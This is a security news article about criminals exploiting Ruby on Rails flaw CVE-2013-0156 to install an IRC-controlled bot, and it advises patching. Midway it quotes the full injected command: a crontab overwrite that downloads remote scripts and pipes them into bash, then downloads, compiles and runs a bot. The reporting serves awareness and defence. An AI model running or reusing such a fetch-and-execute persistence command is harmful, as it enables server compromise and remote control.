Attack wave on Ruby on Rails
Over the past few days, criminals have increasingly attempted to compromise servers via a security hole in the Ruby on Rails (RoR) web application framework. Successful intruders install a bot that waits for further instructions on an IRC channel.
On his blog, security expert Jeff Jarmoc reports that the criminals are trying to exploit one of the vulnerabilities described by CVE identifier 2013-0156. Although the holes were closed back in January, more than enough servers on the net are probably still running an obsolete version of Ruby. Jarmoc says that the attackers attempt to inject the following commands:
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://220.127.116.11/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://18.104.22.168/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
Among other things, this causes the bot (k.c) to be downloaded, compiled and then executed. The security expert has also included the bot's source code on his blog. "k" tries to contact an IRC server hosted at the cvv4you.ru domain and then joins the #rails channel on that IRC server. There, the bot will wait for further instructions. Jarmoc says that k can be instructed to download and execute arbitrary code. The IRC server has since become unavailable – at least on this address.
The bot appears in the process list as "– bash". When launched, it also creates a file called /tmp/tan.pid to ensure that only one instance of the bot will be executed. Those who run a server with Ruby on Rails should always make sure to have the current RoR version installed. The current versions of Ruby on Rails are 3.2.13, 3.1.12 and 2.3.18.